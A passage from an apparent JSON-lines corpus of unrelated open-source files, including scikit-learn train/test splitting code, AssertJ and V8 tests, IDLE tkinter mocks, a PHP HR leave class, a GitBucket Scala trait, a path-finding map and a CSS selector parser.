test_size: %r\" % test_size)\n\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 'f':\n if train_size >= 1.:\n raise ValueError(\"train_size=%f should be smaller \"\n \"than 1.0 or be an integer\" % train_size)\n elif (np.asarray(test_size).dtype.kind == 'f' and\n (train_size + test_size) > 1.):\n raise ValueError('The sum of test_size and train_size = %f, '\n 'should be smaller than 1.0. Reduce '\n 'test_size and/or train_size.' %\n (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n # int values are checked during split based on the input\n raise ValueError(\"Invalid value for train_size: %r\" % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n \"\"\"\n Validation helper to check if the test/test sizes are meaningful wrt to the\n size of the data (n_samples)\n \"\"\"\n if (test_size is not None and np.asarray(test_size).dtype.kind == 'i' and\n test_size >= n_samples):\n raise ValueError('test_size=%d should be smaller than the number of '\n 'samples %d' % (test_size, n_samples))\n\n if (train_size is not None and np.asarray(train_size).dtype.kind == 'i' and\n train_size >= n_samples):\n raise ValueError(\"train_size=%d should be smaller than the number of\"\n \" samples %d\" % (train_size, n_samples))\n\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n\n if test_size is None:\n n_test = n_samples - n_train\n\n if n_train + n_test > n_samples:\n raise ValueError('The sum of train_size and test_size = %d, '\n 'should be smaller than the number of '\n 'samples %d. Reduce test_size and/or '\n 'train_size.' % (n_train + n_test, n_samples))\n\n return int(n_train), int(n_test)\n\n\nclass PredefinedSplit(BaseCrossValidator):\n \"\"\"Predefined split cross-validator\n\n Splits the data into training/test set folds according to a predefined\n scheme. Each sample can be assigned to at most one test set fold, as\n specified by the user through the ``test_fold`` parameter.\n\n Read more in the :ref:`User Guide `.\n\n Examples\n --------\n >>> from sklearn.model_selection import PredefinedSplit\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([0, 0, 1, 1])\n >>> test_fold = [0, 1, -1, 1]\n >>> ps = PredefinedSplit(test_fold)\n >>> ps.get_n_splits()\n 2\n >>> print(ps) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS\n PredefinedSplit(test_fold=array([ 0, 1, -1, 1]))\n >>> for train_index, test_index in ps.split():\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... 
y_train, y_test = y[train_index], y[test_index]\n TRAIN: [1 2 3] TEST: [0]\n TRAIN: [0 2] TEST: [1 3]\n \"\"\"\n\n def __init__(self, test_fold):\n self.test_fold = np.array(test_fold, dtype=np.int)\n self.test_fold = column_or_1d(self.test_fold)\n self.unique_folds = np.unique(self.test_fold)\n self.unique_folds = self.unique_folds[self.unique_folds != -1]\n\n def split(self, X=None, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n ind = np.arange(len(self.test_fold))\n for test_index in self._iter_test_masks():\n train_index = ind[np.logical_not(test_index)]\n test_index = ind[test_index]\n yield train_index, test_index\n\n def _iter_test_masks(self):\n \"\"\"Generates boolean masks corresponding to test sets.\"\"\"\n for f in self.unique_folds:\n test_index = np.where(self.test_fold == f)[0]\n test_mask = np.zeros(len(self.test_fold), dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def get_n_splits(self, X=None, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n return len(self.unique_folds)\n\n\nclass _CVIterableWrapper(BaseCrossValidator):\n \"\"\"Wrapper class for old style cv objects and iterables.\"\"\"\n def __init__(self, cv):\n self.cv = list(cv)\n\n def get_n_splits(self, X=None, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n return len(self.cv)\n\n def split(self, X=None, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n for train, test in self.cv:\n yield train, test\n\n\ndef check_cv(cv=3, y=None, classifier=False):\n \"\"\"Input checker utility for building a cross-validator\n\n Parameters\n ----------\n cv : int, cross-validation generator or an iterable, optional\n Determines the cross-validation splitting strategy.\n Possible inputs for cv are:\n - None, to use the default 3-fold cross-validation,\n - integer, to specify the number of folds.\n - An object to be used as a cross-validation generator.\n - An iterable yielding train/test splits.\n\n For integer/None inputs, if classifier is True and ``y`` is either\n binary or 
multiclass, :class:`StratifiedKFold` is used. In all other\n cases, :class:`KFold` is used.\n\n Refer :ref:`User Guide ` for the various\n cross-validation strategies that can be used here.\n\n y : array-like, optional\n The target variable for supervised learning problems.\n\n classifier : boolean, optional, default False\n Whether the task is a classification task, in which case\n stratified KFold will be used.\n\n Returns\n -------\n checked_cv : a cross-validator instance.\n The return value is a cross-validator which generates the train/test\n splits via the ``split`` method.\n \"\"\"\n if cv is None:\n cv = 3\n\n if isinstance(cv, numbers.Integral):\n if (classifier and (y is not None) and\n (type_of_target(y) in ('binary', 'multiclass'))):\n return StratifiedKFold(cv)\n else:\n return KFold(cv)\n\n if not hasattr(cv, 'split') or isinstance(cv, str):\n if not isinstance(cv, Iterable) or isinstance(cv, str):\n raise ValueError(\"Expected cv as an integer, cross-validation \"\n \"object (from sklearn.model_selection) \"\n \"or an iterable. Got %s.\" % cv)\n return _CVIterableWrapper(cv)\n\n return cv # New style cv objects are passed without any modification\n\n\ndef train_test_split(*arrays, **options):\n \"\"\"Split arrays or matrices into random train and test subsets\n\n Quick utility that wraps input validation and\n ``next(ShuffleSplit().split(X, y))`` and application to input data\n into a single call for splitting (and optionally subsampling) data in a\n oneliner.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n *arrays : sequence of indexables with same length / shape[0]\n Allowed inputs are lists, numpy arrays, scipy-sparse\n matrices or pandas dataframes.\n\n test_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25.\n\n train_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : array-like or None (default is None)\n If not None, data is split in a stratified fashion, using this as\n the class labels.\n\n Returns\n -------\n splitting : list, length=2 * len(arrays)\n List containing train-test split of inputs.\n\n .. versionadded:: 0.16\n If the input is sparse, the output will be a\n ``scipy.sparse.csr_matrix``. Else, output type is the same as the\n input type.\n\n Examples\n --------\n >>> import numpy as np\n >>> from sklearn.model_selection import train_test_split\n >>> X, y = np.arange(10).reshape((5, 2)), range(5)\n >>> X\n array([[0, 1],\n [2, 3],\n [4, 5],\n [6, 7],\n [8, 9]])\n >>> list(y)\n [0, 1, 2, 3, 4]\n\n >>> X_train, X_test, y_train, y_test = train_test_split(\n ... 
X, y, test_size=0.33, random_state=42)\n ...\n >>> X_train\n array([[4, 5],\n [0, 1],\n [6, 7]])\n >>> y_train\n [2, 0, 3]\n >>> X_test\n array([[2, 3],\n [8, 9]])\n >>> y_test\n [1, 4]\n\n \"\"\"\n n_arrays = len(arrays)\n if n_arrays == 0:\n raise ValueError(\"At least one array required as input\")\n test_size = options.pop('test_size', None)\n train_size = options.pop('train_size', None)\n random_state = options.pop('random_state', None)\n stratify = options.pop('stratify', None)\n\n if options:\n raise TypeError(\"Invalid parameters passed: %s\" % str(options))\n\n if test_size is None and train_size is None:\n test_size = 0.25\n\n arrays = indexable(*arrays)\n\n if stratify is not None:\n CVClass = StratifiedShuffleSplit\n else:\n CVClass = ShuffleSplit\n\n cv = CVClass(test_size=test_size,\n train_size=train_size,\n random_state=random_state)\n\n train, test = next(cv.split(X=arrays[0], y=stratify))\n return list(chain.from_iterable((safe_indexing(a, train),\n safe_indexing(a, test)) for a in arrays))\n\n\ntrain_test_split.__test__ = False # to avoid a pb with nosetests\n\ndef _build_repr(self):\n # XXX This is copied from BaseEstimator's get_params\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n # Ignore varargs, kw and default values and pop self\n init_signature = signature(init)\n # Consider the constructor parameters excluding 'self'\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values()\n if p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n # We need deprecation warnings to always be on in order to\n # catch deprecated param values.\n # This is set in utils/__init__.py but it gets overwritten\n # when running under python3 somehow.\n warnings.simplefilter(\"always\", DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n # if the parameter is deprecated, don't show it\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n"} {"text": "// Copyright 2020 the V8 project authors. All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\n'use strict';\n\nclass Class {\n constructor() {\n this.abc = 789;\n this.selfRef = Class;\n }\n}\n\nfunction foo() {\n let a = 123;\n console.log(a);\n}\n\nfoo();\nlet a = 456;\nconsole.log(a);\nlet b = new Class();\nconsole.log(b.abc);\n"} {"text": "/*\n * Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with\n * the License. You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on\n * an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the\n * specific language governing permissions and limitations under the License.\n *\n * Copyright 2012-2020 the original author or authors.\n */\npackage org.assertj.core.internal.integers;\n\nimport static org.assertj.core.api.Assertions.assertThat;\nimport static org.assertj.core.api.Assertions.assertThatExceptionOfType;\nimport static org.assertj.core.api.Assertions.assertThatIllegalArgumentException;\nimport static org.assertj.core.api.Assertions.assertThatNullPointerException;\nimport static org.assertj.core.api.Assertions.catchThrowable;\nimport static org.assertj.core.api.Assertions.withinPercentage;\nimport static org.assertj.core.data.Percentage.withPercentage;\nimport static org.assertj.core.error.ShouldBeEqualWithinPercentage.shouldBeEqualWithinPercentage;\nimport static org.assertj.core.test.TestData.someInfo;\nimport static org.assertj.core.util.FailureMessages.actualIsNull;\nimport static org.mockito.Mockito.verify;\n\nimport org.assertj.core.api.AssertionInfo;\nimport org.assertj.core.internal.IntegersBaseTest;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.params.ParameterizedTest;\nimport org.junit.jupiter.params.provider.CsvSource;\n\nclass Integers_assertIsCloseToPercentage_Test extends IntegersBaseTest {\n\n private static final Integer ZERO = 0;\n private static final Integer ONE = 1;\n private static final Integer TEN = 10;\n\n @Test\n void should_fail_if_actual_is_null() {\n assertThatExceptionOfType(AssertionError.class).isThrownBy(() -> integers.assertIsCloseToPercentage(someInfo(), null, ONE, withPercentage(ONE)))\n .withMessage(actualIsNull());\n }\n\n @Test\n void should_fail_if_expected_value_is_null() {\n assertThatNullPointerException().isThrownBy(() -> integers.assertIsCloseToPercentage(someInfo(), ONE, null, withPercentage(ONE)));\n }\n\n @Test\n void should_fail_if_percentage_is_null() {\n assertThatNullPointerException().isThrownBy(() -> integers.assertIsCloseToPercentage(someInfo(), ONE, ZERO, null));\n }\n\n @Test\n void should_fail_if_percentage_is_negative() {\n assertThatIllegalArgumentException().isThrownBy(() -> integers.assertIsCloseToPercentage(someInfo(), ONE, ZERO, withPercentage(-1)));\n }\n\n @ParameterizedTest\n @CsvSource({\n \"1, 1, 1\",\n \"1, 2, 100\",\n \"-1, -1, 1\",\n \"-1, -2, 100\",\n \"-1, 1, 200\"\n })\n void should_pass_if_difference_is_less_than_given_percentage(Integer actual, Integer other, Integer percentage) {\n integers.assertIsCloseToPercentage(someInfo(), actual, other, withPercentage(percentage));\n }\n\n @ParameterizedTest\n @CsvSource({\n \"1, 1, 0\",\n \"2, 1, 100\",\n \"1, 2, 50\",\n \"-1, -1, 0\",\n \"-2, -1, 100\",\n \"-1, -2, 50\"\n })\n void should_pass_if_difference_is_equal_to_given_percentage(Integer actual, Integer other, Integer percentage) {\n integers.assertIsCloseToPercentage(someInfo(), actual, other, withPercentage(percentage));\n }\n\n @Test\n void should_fail_if_actual_is_not_close_enough_to_expected_value() {\n AssertionInfo info = someInfo();\n\n Throwable error = catchThrowable(() -> integers.assertIsCloseToPercentage(someInfo(), ONE, TEN, withPercentage(TEN)));\n\n assertThat(error).isInstanceOf(AssertionError.class);\n verify(failures).failure(info, shouldBeEqualWithinPercentage(ONE, TEN, withinPercentage(TEN),\n (TEN - ONE)));\n }\n}\n"} {"text": "\"\"\"Classes that replace tkinter gui objects used by an object being tested.\n\nA gui object is anything with a master or parent parameter, which is\ntypically required in spite of what the doc strings 
say.\n\"\"\"\n\nclass Event:\n '''Minimal mock with attributes for testing event handlers.\n\n This is not a gui object, but is used as an argument for callbacks\n that access attributes of the event passed. If a callback ignores\n the event, other than the fact that is happened, pass 'event'.\n\n Keyboard, mouse, window, and other sources generate Event instances.\n Event instances have the following attributes: serial (number of\n event), time (of event), type (of event as number), widget (in which\n event occurred), and x,y (position of mouse). There are other\n attributes for specific events, such as keycode for key events.\n tkinter.Event.__doc__ has more but is still not complete.\n '''\n def __init__(self, **kwds):\n \"Create event with attributes needed for test\"\n self.__dict__.update(kwds)\n\nclass Var:\n \"Use for String/Int/BooleanVar: incomplete\"\n def __init__(self, master=None, value=None, name=None):\n self.master = master\n self.value = value\n self.name = name\n def set(self, value):\n self.value = value\n def get(self):\n return self.value\n\nclass Mbox_func:\n \"\"\"Generic mock for messagebox functions, which all have the same signature.\n\n Instead of displaying a message box, the mock's call method saves the\n arguments as instance attributes, which test functions can then examime.\n The test can set the result returned to ask function\n \"\"\"\n def __init__(self, result=None):\n self.result = result # Return None for all show funcs\n def __call__(self, title, message, *args, **kwds):\n # Save all args for possible examination by tester\n self.title = title\n self.message = message\n self.args = args\n self.kwds = kwds\n return self.result # Set by tester for ask functions\n\nclass Mbox:\n \"\"\"Mock for tkinter.messagebox with an Mbox_func for each function.\n\n This module was 'tkMessageBox' in 2.x; hence the 'import as' in 3.x.\n Example usage in test_module.py for testing functions in module.py:\n ---\nfrom idlelib.idle_test.mock_tk import Mbox\nimport module\n\norig_mbox = module.tkMessageBox\nshowerror = Mbox.showerror # example, for attribute access in test methods\n\nclass Test(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n module.tkMessageBox = Mbox\n\n @classmethod\n def tearDownClass(cls):\n module.tkMessageBox = orig_mbox\n ---\n For 'ask' functions, set func.result return value before calling the method\n that uses the message function. When tkMessageBox functions are the\n only gui alls in a method, this replacement makes the method gui-free,\n \"\"\"\n askokcancel = Mbox_func() # True or False\n askquestion = Mbox_func() # 'yes' or 'no'\n askretrycancel = Mbox_func() # True or False\n askyesno = Mbox_func() # True or False\n askyesnocancel = Mbox_func() # True, False, or None\n showerror = Mbox_func() # None\n showinfo = Mbox_func() # None\n showwarning = Mbox_func() # None\n\nfrom _tkinter import TclError\n\nclass Text:\n \"\"\"A semi-functional non-gui replacement for tkinter.Text text editors.\n\n The mock's data model is that a text is a list of \\n-terminated lines.\n The mock adds an empty string at the beginning of the list so that the\n index of actual lines start at 1, as with Tk. The methods never see this.\n Tk initializes files with a terminal \\n that cannot be deleted. 
It is\n invisible in the sense that one cannot move the cursor beyond it.\n\n This class is only tested (and valid) with strings of ascii chars.\n For testing, we are not concerned with Tk Text's treatment of,\n for instance, 0-width characters or character + accent.\n \"\"\"\n def __init__(self, master=None, cnf={}, **kw):\n '''Initialize mock, non-gui, text-only Text widget.\n\n At present, all args are ignored. Almost all affect visual behavior.\n There are just a few Text-only options that affect text behavior.\n '''\n self.data = ['', '\\n']\n\n def index(self, index):\n \"Return string version of index decoded according to current text.\"\n return \"%s.%s\" % self._decode(index, endflag=1)\n\n def _decode(self, index, endflag=0):\n \"\"\"Return a (line, char) tuple of int indexes into self.data.\n\n This implements .index without converting the result back to a string.\n The result is constrained by the number of lines and linelengths of\n self.data. For many indexes, the result is initially (1, 0).\n\n The input index may have any of several possible forms:\n * line.char float: converted to 'line.char' string;\n * 'line.char' string, where line and char are decimal integers;\n * 'line.char lineend', where lineend='lineend' (and char is ignored);\n * 'line.end', where end='end' (same as above);\n * 'insert', the positions before terminal \\n;\n * 'end', whose meaning depends on the endflag passed to ._endex.\n * 'sel.first' or 'sel.last', where sel is a tag -- not implemented.\n \"\"\"\n if isinstance(index, (float, bytes)):\n index = str(index)\n try:\n index=index.lower()\n except AttributeError:\n raise TclError('bad text index \"%s\"' % index) from None\n\n lastline = len(self.data) - 1 # same as number of text lines\n if index == 'insert':\n return lastline, len(self.data[lastline]) - 1\n elif index == 'end':\n return self._endex(endflag)\n\n line, char = index.split('.')\n line = int(line)\n\n # Out of bounds line becomes first or last ('end') index\n if line < 1:\n return 1, 0\n elif line > lastline:\n return self._endex(endflag)\n\n linelength = len(self.data[line]) -1 # position before/at \\n\n if char.endswith(' lineend') or char == 'end':\n return line, linelength\n # Tk requires that ignored chars before ' lineend' be valid int\n\n # Out of bounds char becomes first or last index of line\n char = int(char)\n if char < 0:\n char = 0\n elif char > linelength:\n char = linelength\n return line, char\n\n def _endex(self, endflag):\n '''Return position for 'end' or line overflow corresponding to endflag.\n\n -1: position before terminal \\n; for .insert(), .delete\n 0: position after terminal \\n; for .get, .delete index 1\n 1: same viewed as beginning of non-existent next line (for .index)\n '''\n n = len(self.data)\n if endflag == 1:\n return n, 0\n else:\n n -= 1\n return n, len(self.data[n]) + endflag\n\n\n def insert(self, index, chars):\n \"Insert chars before the character at index.\"\n\n if not chars: # ''.splitlines() is [], not ['']\n return\n chars = chars.splitlines(True)\n if chars[-1][-1] == '\\n':\n chars.append('')\n line, char = self._decode(index, -1)\n before = self.data[line][:char]\n after = self.data[line][char:]\n self.data[line] = before + chars[0]\n self.data[line+1:line+1] = chars[1:]\n self.data[line+len(chars)-1] += after\n\n\n def get(self, index1, index2=None):\n \"Return slice from index1 to index2 (default is 'index1+1').\"\n\n startline, startchar = self._decode(index1)\n if index2 is None:\n endline, endchar = startline, startchar+1\n else:\n 
endline, endchar = self._decode(index2)\n\n if startline == endline:\n return self.data[startline][startchar:endchar]\n else:\n lines = [self.data[startline][startchar:]]\n for i in range(startline+1, endline):\n lines.append(self.data[i])\n lines.append(self.data[endline][:endchar])\n return ''.join(lines)\n\n\n def delete(self, index1, index2=None):\n '''Delete slice from index1 to index2 (default is 'index1+1').\n\n Adjust default index2 ('index+1) for line ends.\n Do not delete the terminal \\n at the very end of self.data ([-1][-1]).\n '''\n startline, startchar = self._decode(index1, -1)\n if index2 is None:\n if startchar < len(self.data[startline])-1:\n # not deleting \\n\n endline, endchar = startline, startchar+1\n elif startline < len(self.data) - 1:\n # deleting non-terminal \\n, convert 'index1+1 to start of next line\n endline, endchar = startline+1, 0\n else:\n # do not delete terminal \\n if index1 == 'insert'\n return\n else:\n endline, endchar = self._decode(index2, -1)\n # restricting end position to insert position excludes terminal \\n\n\n if startline == endline and startchar < endchar:\n self.data[startline] = self.data[startline][:startchar] + \\\n self.data[startline][endchar:]\n elif startline < endline:\n self.data[startline] = self.data[startline][:startchar] + \\\n self.data[endline][endchar:]\n startline += 1\n for i in range(startline, endline+1):\n del self.data[startline]\n\n def compare(self, index1, op, index2):\n line1, char1 = self._decode(index1)\n line2, char2 = self._decode(index2)\n if op == '<':\n return line1 < line2 or line1 == line2 and char1 < char2\n elif op == '<=':\n return line1 < line2 or line1 == line2 and char1 <= char2\n elif op == '>':\n return line1 > line2 or line1 == line2 and char1 > char2\n elif op == '>=':\n return line1 > line2 or line1 == line2 and char1 >= char2\n elif op == '==':\n return line1 == line2 and char1 == char2\n elif op == '!=':\n return line1 != line2 or char1 != char2\n else:\n raise TclError('''bad comparison operator \"%s\":'''\n '''must be <, <=, ==, >=, >, or !=''' % op)\n\n # The following Text methods normally do something and return None.\n # Whether doing nothing is sufficient for a test will depend on the test.\n\n def mark_set(self, name, index):\n \"Set mark *name* before the character at index.\"\n pass\n\n def mark_unset(self, *markNames):\n \"Delete all marks in markNames.\"\n\n def tag_remove(self, tagName, index1, index2=None):\n \"Remove tag tagName from all characters between index1 and index2.\"\n pass\n\n # The following Text methods affect the graphics screen and return None.\n # Doing nothing should always be sufficient for tests.\n\n def scan_dragto(self, x, y):\n \"Adjust the view of the text according to scan_mark\"\n\n def scan_mark(self, x, y):\n \"Remember the current X, Y coordinates.\"\n\n def see(self, index):\n \"Scroll screen to make the character at INDEX is visible.\"\n pass\n\n # The following is a Misc method inherited by Text.\n # It should properly go in a Misc mock, but is included here for now.\n\n def bind(sequence=None, func=None, add=None):\n \"Bind to this widget at event sequence a call to function func.\"\n pass\n"} {"text": " 'Addition',\n 'ADDITION' => 'Addition'\n ];\n public $field_a = [\n 'hr_leave_transaction_header_id',\n 'leave_type',\n 'transaction_type',\n 'leave_quantity',\n 'from_date',\n 'to_date',\n 'reason',\n 'contact_details',\n 'created_by',\n 'creation_date',\n 'last_update_by',\n 'last_update_date',\n ];\n public 
$fields_inHeader_needsToBeInserted_inPOST = [\n \"hr_leave_transaction_header_id\"\n ];\n public $requiredField = [\n 'leave_type',\n 'transaction_type',\n 'leave_quantity',\n 'from_date'\n ];\n public $fields_inForm_notinDataBase = [\n \"monetary_value\"\n ];\n public $hr_leave_transaction_line_id;\n public $hr_leave_transaction_header_id;\n public $leave_type;\n public $transaction_type;\n public $leave_quantity;\n public $from_date;\n public $to_date;\n public $reason;\n public $contact_details;\n public $created_by;\n public $creation_date;\n public $last_update_by;\n public $last_update_date;\n\n Public static function find_monetary_value_by_id($hr_leave_transaction_line_id, $element_id = '', $element_value = '') {\n if (empty($hr_leave_transaction_line_id)) {\n return null;\n }\n if (empty($element_id) || empty($element_value)) {\n $ele_entry_line = self::find_by_id($hr_leave_transaction_line_id);\n $element_id = $ele_entry_line->element_id;\n $element_value = $ele_entry_line->element_value;\n }\n $ele_details = hr_compensation_element::find_by_id($element_id);\n $amount = null;\n\n switch ($ele_details->calculation_rule) {\n case 'FLAT' :\n $amount = $element_value;\n break;\n\n case 'P_BASIC' :\n $total_amount = 0;\n $this_details = self::find_by_id($hr_leave_transaction_line_id);\n $all_basic_lines = hr_leave_transaction_header::find_all_basic_lines($this_details->hr_leave_transaction_header_id);\n foreach ($all_basic_lines as $lines) {\n $total_amount += $lines->element_value;\n }\n $amount = ($total_amount * $this_details->element_value) / 100;\n break;\n\n case 'P_REGULAR' :\n $total_amount = 0;\n $this_details = self::find_by_id($hr_leave_transaction_line_id);\n $all_basic_lines = hr_leave_transaction_header::find_all_regular_lines($this_details->hr_leave_transaction_header_id);\n foreach ($all_basic_lines as $lines) {\n $total_amount += $lines->element_value;\n }\n $amount = ($total_amount * $this_details->element_value) / 100;\n break;\n\n case 'P_BASIC_REGULAR' :\n $total_amount = 0;\n $this_details = self::find_by_id($hr_leave_transaction_line_id);\n $all_basic_lines = hr_leave_transaction_header::find_all_regular_lines($this_details->hr_leave_transaction_header_id);\n foreach ($all_basic_lines as $lines) {\n $total_amount += $lines->element_value;\n }\n $amount = ($total_amount * $this_details->element_value) / 100;\n break;\n\n case 'default' :\n break;\n }\n return $amount;\n }\n\n }\n\n//end of inv_transaction class\n?>"} {"text": "package gitbucket.core.model\n\nimport com.github.takezoe.slick.blocking.BlockingJdbcProfile\nimport gitbucket.core.util.DatabaseConfig\n\ntrait Profile {\n val profile: BlockingJdbcProfile\n import profile.blockingApi._\n\n /**\n * java.util.Date Mapped Column Types\n */\n implicit val dateColumnType = MappedColumnType.base[java.util.Date, java.sql.Timestamp](\n d => new java.sql.Timestamp(d.getTime),\n t => new java.util.Date(t.getTime)\n )\n\n /**\n * WebHookBase.Event Column Types\n */\n implicit val eventColumnType = MappedColumnType.base[WebHook.Event, String](_.name, WebHook.Event.valueOf(_))\n\n /**\n * Extends Column to add conditional condition\n */\n implicit class RichColumn(c1: Rep[Boolean]) {\n def &&(c2: => Rep[Boolean], guard: => Boolean): Rep[Boolean] = if (guard) c1 && c2 else c1\n }\n\n /**\n * Returns system date.\n */\n def currentDate = new java.util.Date()\n\n}\n\ntrait ProfileProvider { self: Profile =>\n\n lazy val profile = DatabaseConfig.slickDriver\n\n}\n\ntrait CoreProfile\n extends ProfileProvider\n with 
Profile\n with AccessTokenComponent\n with AccountComponent\n with ActivityComponent // ActivityComponent has been deprecated, but keep it for binary compatibility\n with CollaboratorComponent\n with CommitCommentComponent\n with CommitStatusComponent\n with GroupMemberComponent\n with IssueComponent\n with IssueCommentComponent\n with IssueLabelComponent\n with LabelComponent\n with PriorityComponent\n with MilestoneComponent\n with PullRequestComponent\n with RepositoryComponent\n with SshKeyComponent\n with GpgKeyComponent\n with RepositoryWebHookComponent\n with RepositoryWebHookEventComponent\n with AccountWebHookComponent\n with AccountWebHookEventComponent\n with AccountFederationComponent\n with ProtectedBranchComponent\n with DeployKeyComponent\n with ReleaseTagComponent\n with ReleaseAssetComponent\n with AccountExtraMailAddressComponent\n\nobject Profile extends CoreProfile\n"} {"text": "agents:\n- goal: [2, 4]\n name: agent0\n start: [4, 5]\n- goal: [5, 2]\n name: agent1\n start: [0, 2]\n- goal: [1, 6]\n name: agent2\n start: [7, 5]\n- goal: [6, 5]\n name: agent3\n start: [0, 1]\n- goal: [6, 7]\n name: agent4\n start: [5, 1]\n- goal: [5, 4]\n name: agent5\n start: [7, 1]\n- goal: [1, 2]\n name: agent6\n start: [7, 4]\n- goal: [6, 1]\n name: agent7\n start: [3, 6]\n- goal: [4, 2]\n name: agent8\n start: [7, 3]\n- goal: [4, 3]\n name: agent9\n start: [6, 5]\n- goal: [7, 6]\n name: agent10\n start: [3, 5]\n- goal: [4, 5]\n name: agent11\n start: [2, 3]\n- goal: [3, 4]\n name: agent12\n start: [1, 6]\n- goal: [2, 5]\n name: agent13\n start: [6, 4]\n- goal: [4, 4]\n name: agent14\n start: [4, 2]\n- goal: [0, 7]\n name: agent15\n start: [6, 7]\n- goal: [5, 0]\n name: agent16\n start: [7, 6]\nmap:\n dimensions: [8, 8]\n obstacles:\n - [3, 7]\n - [2, 7]\n - [0, 4]\n - [1, 1]\n - [4, 1]\n - [3, 0]\n - [0, 0]\n - [3, 2]\n - [0, 6]\n - [3, 3]\n - [6, 2]\n - [5, 5]\n"} {"text": "\"use strict\";\n\nmodule.exports = parse;\n\nvar re_name = /^(?:\\\\.|[\\w\\-\\u00c0-\\uFFFF])+/,\n re_escape = /\\\\([\\da-f]{1,6}\\s?|(\\s)|.)/ig,\n //modified version of https://github.com/jquery/sizzle/blob/master/src/sizzle.js#L87\n re_attr = /^\\s*((?:\\\\.|[\\w\\u00c0-\\uFFFF\\-])+)\\s*(?:(\\S?)=\\s*(?:(['\"])(.*?)\\3|(#?(?:\\\\.|[\\w\\u00c0-\\uFFFF\\-])*)|)|)\\s*(i)?\\]/;\n\nvar actionTypes = {\n\t__proto__: null,\n\t\"undefined\": \"exists\",\n\t\"\": \"equals\",\n\t\"~\": \"element\",\n\t\"^\": \"start\",\n\t\"$\": \"end\",\n\t\"*\": \"any\",\n\t\"!\": \"not\",\n\t\"|\": \"hyphen\"\n};\n\nvar simpleSelectors = {\n\t__proto__: null,\n\t\">\": \"child\",\n\t\"<\": \"parent\",\n\t\"~\": \"sibling\",\n\t\"+\": \"adjacent\"\n};\n\nvar attribSelectors = {\n\t__proto__: null,\n\t\"#\": [\"id\", \"equals\"],\n\t\".\": [\"class\", \"element\"]\n};\n\n//pseudos, whose data-property is parsed as well\nvar unpackPseudos = {\n\t__proto__: null,\n\t\"has\": true,\n\t\"not\": true,\n\t\"matches\": true\n};\n\nvar stripQuotesFromPseudos = {\n\t__proto__: null,\n\t\"contains\": true,\n\t\"icontains\": true\n};\n\nvar quotes = {\n\t__proto__: null,\n\t\"\\\"\": true,\n\t\"'\": true\n};\n\n//unescape function taken from https://github.com/jquery/sizzle/blob/master/src/sizzle.js#L139\nfunction funescape( _, escaped, escapedWhitespace ) {\n\tvar high = \"0x\" + escaped - 0x10000;\n\t// NaN means non-codepoint\n\t// Support: Firefox\n\t// Workaround erroneous numeric interpretation of +\"0x\"\n\treturn high !== high || escapedWhitespace ?\n\t\tescaped :\n\t\t// BMP codepoint\n\t\thigh < 0 ?\n\t\t\tString.fromCharCode( high + 
